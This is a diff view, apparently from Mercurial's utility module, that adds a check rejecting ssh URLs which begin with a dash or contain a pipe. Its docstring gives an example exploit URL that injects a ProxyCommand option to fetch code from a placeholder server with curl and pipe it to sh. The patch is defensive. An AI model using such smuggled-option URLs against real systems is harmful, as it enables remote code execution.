equal
deleted
inserted
replaced
2892 return path and path[1:2] == ':' and path[0:1].isalpha() |
2892 return path and path[1:2] == ':' and path[0:1].isalpha() |
2893 |
2893 |
2894 def urllocalpath(path): |
2894 def urllocalpath(path): |
2895 return url(path, parsequery=False, parsefragment=False).localpath() |
2895 return url(path, parsequery=False, parsefragment=False).localpath() |
2896 |
2896 |
|
2897 def checksafessh(path): |
|
2898 """check if a path / url is a potentially unsafe ssh exploit (SEC) |
|
2899 |
|
2900 This is a sanity check for ssh urls. ssh will parse the first item as |
|
2901 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path. |
|
2902 Let's prevent these potentially exploited urls entirely and warn the |
|
2903 user. |
|
2904 |
|
2905 Raises an error.Abort when the url is unsafe. |
|
2906 """ |
|
2907 path = urlreq.unquote(path) |
|
2908 if path.startswith('ssh://-') or '|' in path: |
|
2909 raise error.Abort(_('potentially unsafe url: %r') % |
|
2910 (path,)) |
|
2911 |
2897 def hidepassword(u): |
2912 def hidepassword(u): |
2898 '''hide user credential in a url string''' |
2913 '''hide user credential in a url string''' |
2899 u = url(u) |
2914 u = url(u) |
2900 if u.passwd: |
2915 if u.passwd: |
2901 u.passwd = '***' |
2916 u.passwd = '***' |